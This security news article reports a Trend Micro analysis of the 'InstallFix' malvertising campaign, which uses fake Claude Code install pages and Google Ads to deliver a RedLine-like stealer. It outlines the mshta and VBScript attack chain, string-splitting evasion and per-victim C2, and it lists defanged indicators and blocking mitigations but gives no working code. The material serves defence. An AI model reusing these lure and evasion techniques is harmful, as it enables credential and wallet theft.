A sophisticated malware distribution campaign dubbed InstallFix is using fake Claude AI installation pages, promoted through paid Google Ads, to trick users into executing multi-stage malware on their own Windows and macOS systems. Documented by Trend Micro researchers, the campaign exploits the trust users place in AI brand names and the credibility of sponsored search results, targeting both technical developers and non-technical users across the United States, Malaysia, the Netherlands, and Thailand.
The Attack Begins with a Fake Google Ad
When a user searches for terms like “Claude Code” or “Claude Code install,” a sponsored advertisement appears at the very top of Google search results, visually indistinguishable from a legitimate link. One click lands the user on a fraudulent site that closely mimics an official Claude AI installation guide, complete with step-by-step instructions and operating system-specific commands presented in a format that looks entirely authentic.
This technique, known as malvertising, is particularly effective because users have been conditioned to trust prominent search results and professional-looking documentation pages. The attackers deliberately targeted Claude Code specifically because its developer audience is already familiar and comfortable with running terminal commands copied from documentation, lowering the psychological barrier to execution.
ClickFix: Social Engineering Meets Malware Delivery
The fraudulent pages use a technique called ClickFix, which presents a required installation command framed as a necessary setup step. On Windows, executing the provided command triggers a hidden attack chain beginning with mshta.exe, a legitimate Windows HTML Application host that threat actors have long abused to execute remote payloads while bypassing superficial security checks.
The downloaded file is named claude.msixbundle and carries valid Microsoft Marketplace signatures, allowing it to pass many automated security reviews. Embedded inside the package is an HTA payload containing obfuscated VBScript. The malicious window is resized to zero pixels so nothing appears on screen during execution. The VBScript then launches PowerShell commands through the SysWOW64 subsystem, reconstructing the word “powershell” at runtime from split variables to evade string-based detection rules.
Per-Victim Command and Control Infrastructure
One of the most technically sophisticated aspects of the InstallFix campaign is its per-victim command-and-control architecture. The stager generates a unique machine identifier by hashing the computer name and username together, then constructs a victim-specific URL on attacker-controlled infrastructure at oakenfjrod[.]ru. Each compromised machine receives its final payload from a unique subdomain, making bulk network-level blocking extremely difficult and allowing the attackers to track individual infections with precision.
This architecture also provides the operators with operational flexibility: they can serve different final payloads to different victim categories, expire URLs after use to frustrate forensic analysis, and maintain visibility into which specific machines have been successfully compromised.
Persistence, Data Theft, and RedLine Stealer Connections
Once the final shellcode executes entirely in memory, the malware establishes persistence by creating scheduled tasks, ensuring it survives system reboots and continues operating silently in the background. Dynamic analysis by Trend Micro researchers confirmed the malware making outbound connections to attacker-controlled servers, collecting browser credential data, and targeting e-wallet applications installed on the infected machine.
The indicators of compromise tied to this campaign, including infrastructure patterns, obfuscation techniques, and payload behavior, align closely with those associated with RedLine Stealer campaigns documented since 2023. RedLine Stealer is a well-established information-stealing malware family sold as a service on cybercriminal forums, capable of harvesting passwords, cookies, credit card data, cryptocurrency wallet credentials, and VPN session tokens.
Why AI Brand Lures Are Especially Dangerous
The use of Claude AI as a lure reflects a broader trend in which threat actors rapidly adapt their social engineering to exploit interest in new and popular technologies. As AI tools gain mainstream adoption, more users are actively searching for installation guides, which creates a predictable and exploitable search pattern that malvertising campaigns can efficiently intercept.
Unlike phishing emails that arrive unsolicited, malvertising attacks intercept users at the moment of active intent: when they are already seeking the exact product being impersonated. This makes the deception considerably harder to detect and resist compared to unsolicited communication.
Indicators of Compromise
Key indicators published by Trend Micro for the InstallFix campaign include the domain download-version[.]1-5-8[.]com hosting the malicious installer, the C2 domain oakenfjrod[.]ru with victim-unique subdomains for payload delivery, and outbound connections to IP addresses 104[.]21[.]0[.]95, 185[.]177[.]239[.]255, and 77[.]91[.]97[.]244. The SHA-256 hash of the recovered Stage 5 payload is 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74.
Recommended Mitigations
Organizations and individuals can reduce exposure to campaigns like InstallFix through several practical measures:
- Block known malicious domains and IP addresses at the firewall and DNS filtering layers, including
oakenfjrod[.]ruanddownload-version[.]1-5-8[.]com - Restrict or monitor the use of
mshta.exeand similar dual-use Windows scripting tools in environments where they are not operationally required - Train users never to run commands copied from websites reached via sponsored search results, and to always verify installer sources against official vendor domains
- Prefer trusted package managers such as npm, pip, brew, or winget over manual script execution from third-party pages
- Deploy application control or allowlisting policies that prevent execution of unsigned or unexpected MSIX packages
- Monitor for suspicious scheduled task creation, which the malware uses to maintain persistence across reboots
The InstallFix campaign demonstrates that threat actors are investing heavily in campaigns that meet users where they are: in search results, on documentation-styled pages, and at the moment of downloading tools they actively want. Vigilance at the point of installation, rather than solely at the point of detection, is increasingly critical to preventing compromise.